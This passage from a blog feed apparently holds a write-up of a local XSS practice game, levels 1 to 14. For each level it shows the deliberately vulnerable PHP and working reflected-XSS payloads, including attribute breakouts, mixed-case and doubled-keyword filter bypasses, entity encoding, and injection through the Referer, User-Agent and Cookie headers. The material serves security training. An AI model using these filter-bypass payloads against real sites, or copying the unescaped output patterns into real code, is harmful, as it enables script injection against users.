<p>This challenge gives the attacker direct access to the directory listing, so simply walking through it and searching is enough.</p>
</blockquote>
</summary>
<category term="wp" scheme="https://singlemindedt.github.io/tags/wp/"/>
<category term="CTF" scheme="https://singlemindedt.github.io/tags/CTF/"/>
</entry>
<entry>
<title>XSS Mini-Game</title>
<link href="https://singlemindedt.github.io/2020/08/04/XSS%E5%B0%8F%E6%B8%B8%E6%88%8F/"/>
<id>https://singlemindedt.github.io/2020/08/04/XSS小游戏/</id>
<published>2020-08-04T04:35:43.000Z</published>
<updated>2020-08-28T11:07:48.940Z</updated>
<content type="html"><![CDATA[<h3 id="第1关"><a href="#第1关" class="headerlink" title="第1关"></a>Level 1</h3><p>The input variable is output directly.</p><p>Try:</p><figure class="highlight js"><table><tr><td class="code"><pre><span class="line"><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/xssgame-master/level1.php?name=<span class="xml"><span class="tag"><<span class="name">script</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span></span><br></pre></td></tr></table></figure><p>Success.</p><p>Looking at the source:</p><figure class="highlight autohotkey"><table><tr><td class="code"><pre><span class="line">The value of name is passed to the `$str` variable via GET without any filtering or restriction.</span><br></pre></td></tr></table></figure><h3 id="第2关"><a href="#第2关" class="headerlink" title="第2关"></a>Level 2</h3><p>The keyword variable is passed in via <strong>GET</strong>, assigned to <code>$str</code>, and then placed into both the <code>&lt;h2&gt;</code> tag and the <code>&lt;input&gt;</code> tag. The <code>&lt;h2&gt;</code> tag is encoded with <code>htmlspecialchars($str)</code>, while the <code>&lt;input&gt;</code> tag has no filtering at all, so we try to close the <code>&lt;input&gt;</code> tag and trigger an event, using <code>"></code> to close it.</p><figure class="highlight js"><table><tr><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level2.php?keyword=xss"><script>alert(1)</script>//&submit=%E6%90%9C%E7%B4%A2</span></span><br></pre></td></tr></table></figure><p>Looking at the source:</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"><?php </span><br><span class="line">ini_set("display_errors", 0);</span><br><span class="line">$str = $_GET["keyword"];</span><br><span class="line">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center></span><br><span class="line"><form action=level2.php method=GET></span><br><span class="line"><input name=keyword value="'.$str.'"></span><br><span class="line"><input type=submit name=submit value="搜索"/></span><br><span class="line"></form></span><br><span class="line"></center>';</span><br><span class="line">?></span><br></pre></td></tr></table></figure><h4 id="🐖:htmlspecialchars-定义和用法"><a href="#🐖:htmlspecialchars-定义和用法" class="headerlink" title="🐖:htmlspecialchars() 定义和用法"></a>🐖:<a href="http://yige.org/php/func_string_htmlspecialchars.php" target="_blank" rel="noopener">htmlspecialchars() definition and usage</a></h4><p>The htmlspecialchars() function converts predefined characters to HTML entities.</p><p>The predefined characters are:</p><ul><li>& (ampersand) becomes <code>&amp</code>;</li><li>“ (double quote) becomes <code>&quot</code></li><li>‘ (single quote) becomes <code>&#039</code> </li><li>< (less than) becomes <code>&lt</code></li><li>> (greater than) becomes <code>&gt</code></li></ul><p>+++</p><p>The page after htmlspecialchars() processing:</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"><title>第2关</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>第2关 窒息的操作</h1></span><br><span class="line"><h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center></span><br><span class="line"><form action=level2.php method=GET></span><br><span class="line"><input name=keyword value="<script>alert(1)</script>"></span><br><span class="line"><input type=submit name=submit value="搜索"/></span><br><span class="line"></form></span><br></pre></td></tr></table></figure><p>+++</p><h3 id="第3关"><a href="#第3关" class="headerlink" title="第3关"></a>Level 3</h3><p>The input variable is passed through the htmlspecialchars function. Its default configuration does not encode single quotes; only when the quotestyle option is set to ENT_QUOTES are single quotes encoded. Here the function handles <code>&lt; &gt; "</code> but not the single quote, so the payload is built from a single quote plus a construct that needs no <code>&lt;&gt;</code>, first closing the value attribute with a single quote.</p><figure class="highlight js"><table><tr><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=' onclick=alert(1) //</span></span><br><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=' onclick='alert(1)'</span></span><br><span class="line"><span class="comment">//The onclick event fires when the object is clicked.</span></span><br><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=' onmouseover=alert(1) x='</span></span><br><span class="line"><span class="comment">//The onmouseover event fires when the mouse pointer moves over the specified element.</span></span><br></pre></td></tr></table></figure><p>🐖:<a href="https://www.runoob.com/jsref/event-onmouseover.html" target="_blank" rel="noopener">onmouseover event</a></p><p>How htmlspecialchars handles the input:</p><p><img src="https://s1.ax1x.com/2020/08/28/doN90I.png" alt="doN90I.png"></p><p>+++</p><p><img src="https://s1.ax1x.com/2020/08/28/doNpnA.png" alt="doNpnA.png"></p><p>+++</p><h3 id="第4关"><a href="#第4关" class="headerlink" title="第4关"></a>Level 4</h3><p>Angle brackets are filtered, so the payload must not contain either of them. The value attribute differs from level 3: here a double quote is needed to close it.</p><figure class="highlight js"><table><tr><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/xssgame-master/level3.php?keyword=" onclick=alert(1) //</span></span><br></pre></td></tr></table></figure><p>Then click the input box.</p><h3
id="第5关"><a href="#第5关" class="headerlink" title="第5关"></a>Level 5</h3><p><code>&lt;script</code> and <code>on</code> are replaced with <code>&lt;scr_ipt</code> and <code>o_n</code>; build the payload from other constructs.</p><p>🐖:<a href="https://www.w3school.com.cn/js/jsref_events.asp" target="_blank" rel="noopener">JavaScript event reference</a></p><p>Since every JavaScript event name contains "on", JavaScript events cannot be used to pop the alert here.</p><p>Here we use the <code>href attribute of the &lt;a&gt; tag</code>:</p><p>🐖:<a href="https://www.w3school.com.cn/tags/att_a_href.asp" target="_blank" rel="noopener">href attribute of the &lt;a&gt; tag</a></p><blockquote><p>The href attribute of the &lt;a&gt; tag specifies the URL of the link target.</p><p>The value of href can be the relative or absolute URL of any valid document, including fragment identifiers and JavaScript code. If the user selects the content of the &lt;a&gt; tag, the browser tries to retrieve and display the document at the URL given by href, or executes the list of JavaScript expressions, methods and functions.</p></blockquote><figure class="highlight vim"><table><tr><td class="code"><pre><span class="line"><span class="string">"><a href="</span>javascrip<span class="variable">t:alert</span>(<span class="number">1</span>)<span class="comment">">xss</a></span></span><br></pre></td></tr></table></figure><p>Looking at the source:</p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level5.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.$str3.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>🐖: The strtolower() function converts a string to lowercase.</p><p>Related:</p><table><thead><tr><th>Function</th><th>Effect</th></tr></thead><tbody><tr><td>lcfirst()</td><td>Converts the first character of a string to lowercase</td></tr><tr><td>strtoupper()</td><td>Converts a string to uppercase</td></tr><tr><td>ucfirst()</td><td>Converts the first character of a string to uppercase</td></tr><tr><td>ucwords()</td><td>Converts the first character of each word in a string to uppercase</td></tr></tbody></table><h3 id="第6关"><a href="#第6关" class="headerlink" title="第6关"></a>Level 6</h3><p>Source:</p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str2=str_replace(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,$str5);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level6.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.$str6.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>“&lt;script”, “on”, “src”, “data” and “href” are all replaced, but the input is not case-normalized first, so mixed case bypasses the filter.</p><figure class="highlight xml"><table><tr><td class="code"><pre><span class="line">"><span class="tag"><<span class="name">Script</span>></span>alert(1)<span class="tag"></<span class="name">Script</span>></span></span><br></pre></td></tr></table></figure><h3 id="第7关"><a href="#第7关" class="headerlink" title="第7关"></a>Level 7</h3><p>Source:</p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str =strtolower( $_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">""</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">""</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">""</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">""</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">""</span>,$str5);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level7.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.$str6.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The input is lowercased and the sensitive strings are replaced with the empty string.</p><p>Double-writing bypasses this.</p><figure class="highlight xml"><table><tr><td class="code"><pre><span class="line">"><span class="tag"><<span class="name">scscriptript</span>></span>alert(1)<span class="tag"></<span class="name">scscriptript</span>></span></span><br></pre></td></tr></table></figure><h3 id="第8关"><a href="#第8关" class="headerlink" title="第8关"></a>Level 8</h3><p>Source:</p><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,$str3);</span><br><span
class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,$str5);</span><br><span class="line">$str7=str_replace(<span class="string">'"'</span>,<span class="string">'&quot'</span>,$str6);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level8.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.htmlspecialchars($str).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"> </span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.$str7.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>小写转换,敏感字符加<code>_</code>替换,同时对<code>"</code>进行实体化替换;</p><p>通过href属性将处理的值输出;</p><p>可使用编码绕过,利用Javascript伪协议后+其他编码</p><blockquote><p>如果用户选择了 <a> 标签中的内容,那么浏览器会尝试检索并显示 href 属性指定的 URL 所表示的文档,或者执行 JavaScript 表达式、方法和函数的列表。</a></p></blockquote><p>将敏感字符中的部分字母ASCII转URL编码:</p><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">javascri</span>&<span class="selector-id">#x70</span>;<span class="selector-tag">t</span><span class="selector-pseudo">:alert()</span> <span 
class="selector-id">#HTML</span>实体编码(<span class="selector-tag">HEX</span>) </span><br><span class="line"><span class="selector-tag">javascri</span>&<span class="selector-id">#112</span>;<span class="selector-tag">t</span><span class="selector-pseudo">:alert()</span> <span class="selector-id">#HTML</span>实体编码(<span class="selector-tag">DEC</span>)</span><br></pre></td></tr></table></figure><p>🐖:</p><ul><li><p><a href="https://www.cnblogs.com/polk6/p/html-entity.html" target="_blank" rel="noopener">HTML Entity 字符实体(字符转义)</a></p></li><li><p><a href="https://www.w3school.com.cn/tags/html_ref_urlencode.html" target="_blank" rel="noopener">HTML URL 编码</a></p></li></ul><h3 id="第9关"><a href="#第9关" class="headerlink" title="第9关"></a>第9关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = strtolower($_GET[<span class="string">"keyword"</span>]);</span><br><span class="line">$str2=str_replace(<span 
class="string">"script"</span>,<span class="string">"scr_ipt"</span>,$str);</span><br><span class="line">$str3=str_replace(<span class="string">"on"</span>,<span class="string">"o_n"</span>,$str2);</span><br><span class="line">$str4=str_replace(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,$str3);</span><br><span class="line">$str5=str_replace(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,$str4);</span><br><span class="line">$str6=str_replace(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,$str5);</span><br><span class="line">$str7=str_replace(<span class="string">'"'</span>,<span class="string">'&quot'</span>,$str6);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level9.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.htmlspecialchars($str).<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=添加友情链接 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">false</span>===strpos($str7,<span class="string">'http://'</span>))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.$str7.<span 
class="string">'">友情链接</a></center>'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li><p>字符转为小写,敏感字符替换;</p></li><li><p>strpos() 函数查找字符串在另一字符串中第一次出现的位置。</p></li></ul><blockquote><p><strong>注释:</strong>strpos() 函数对大小写敏感。</p><p><strong>返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。</strong></p><p><strong>注释:</strong>字符串位置从 0 开始,不是从 1 开始。</p></blockquote><ul><li>通过href属性将处理的值输出;</li></ul><p>需要使strpos()函数的返回结果不为false,即在keyword中需要包含<code>http://</code>;</p><p>可采用以下两种思路:</p><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">注释:</span><br><span class="line">javascri&<span class="attr">#x70</span>;t:alert<span class="comment">()</span><span class="comment">//http://</span></span><br><span class="line">javascri&<span class="attr">#x70</span>;t:alert<span class="comment">()</span><span class="comment">/*http://*/</span></span><br></pre></td></tr></table></figure><figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">位置放在弹窗提示里</span><br><span class="line"><span class="selector-tag">javascri</span><span class="selector-tag">&</span><span class="selector-id">#x70</span>;<span class="selector-tag">t</span><span class="selector-pseudo">:alert('http</span>:<span class="comment">//')</span></span><br></pre></td></tr></table></figure><h3 id="第10关"><a href="#第10关" class="headerlink" title="第10关"></a>第10关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str11 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li>通过GET传值的有两个参数keyword和t_sort,t_sort字符中的<code><></code>被替换为空;</li><li>存在三个隐藏的input输入框</li></ul><p>可构造如下payload:</p><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td 
class="code"><pre><span class="line">?t_sort=<span class="string">"type="</span><span class="built_in">text</span><span class="string">" onclick = "</span>alert(<span class="number">1</span>)</span><br></pre></td></tr></table></figure><h3 id="第11关"><a href="#第11关" class="headerlink" title="第11关"></a>第11关</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str11=$_SERVER[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" 
type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.htmlspecialchars($str00).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ref" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>关键:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$str11=$_SERVER[<span class="string">'HTTP_REFERER'</span>];<span class="comment">//获取HTTP中referer信息</span></span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><input name=<span class="string">"t_ref"</span> value=<span class="string">"'.$str33.'"</span> type=<span class="string">"hidden"</span>></span><br></pre></td></tr></table></figure><p>可对referer注入;</p><p>抓包,Referer处添加如下代码:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer: <span class="string">"onclick=alert(1) type="</span>text<span class="string">"</span></span><br></pre></td></tr></table></figure><h3 id="第12关"><a href="#第12关" class="headerlink" title="第12关"></a>第12关</h3><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str11=$_SERVER[<span class="string">'HTTP_USER_AGENT'</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.htmlspecialchars($str00).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ua" 
value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Same idea as Level 11, but the reflected header is now User-Agent; add the following in the User-Agent header:</p><figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">" onmouseover=alert(1) type="</span>text<span class="string">"</span></span><br></pre></td></tr></table></figure><h3 id="第13关"><a href="#第13关" class="headerlink" title="第13关"></a>Level 13</h3><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">setcookie(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, time()+<span class="number">3600</span>);</span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"keyword"</span>];</span><br><span class="line">$str00 = $_GET[<span class="string">"t_sort"</span>];</span><br><span class="line">$str11=$_COOKIE[<span class="string">"user"</span>];</span><br><span class="line">$str22=str_replace(<span class="string">">"</span>,<span 
class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.htmlspecialchars($str).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.htmlspecialchars($str00).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_cook" value="'</span>.$str33.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>Note: <a href="https://www.w3school.com.cn/php/func_http_setcookie.asp" target="_blank" rel="noopener">the setcookie() function</a></p><blockquote><p>The setcookie() function sends an HTTP cookie to the client.</p></blockquote><p>Key part:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">setcookie(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, time()+<span class="number">3600</span>);</span><br><span class="line">$str11=$_COOKIE[<span class="string">"user"</span>];</span><br><span class="line">$str22=str_replace(<span 
class="string">">"</span>,<span class="string">""</span>,$str11);</span><br><span class="line">$str33=str_replace(<span class="string">"<"</span>,<span class="string">""</span>,$str22);</span><br><span class="line"><input name=<span class="string">"t_cook"</span> value=<span class="string">"'.$str33.'"</span> type=<span class="string">"hidden"</span>></span><br></pre></td></tr></table></figure><p>The cookie value is reflected with only &lt; and &gt; stripped, so capturing the request and changing the user value in the Cookie header is enough:</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user=<span class="string">" onclick=alert(1) type="</span>text<span class="string">"</span></span><br></pre></td></tr></table></figure><h3 id="第14关"><a href="#第14关" class="headerlink" title="第14关"></a>Level 14</h3><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line">ini_set(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line">$str = $_GET[<span class="string">"src"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<body><span class="ng-include:'</span>.htmlspecialchars($str).<span class="string">'"></span></body>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><blockquote><p>Note:</p><p>The <strong>ng-include</strong> directive is used to include an external HTML file.</p><p>The included content becomes a child node of the specified element.</p><p>The value of the <strong>ng-include</strong> attribute can be an expression that returns a file name.</p><p>By default, the included file must be on the same domain.</p></blockquote><p>Using this file inclusion, the following payload can be constructed:</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
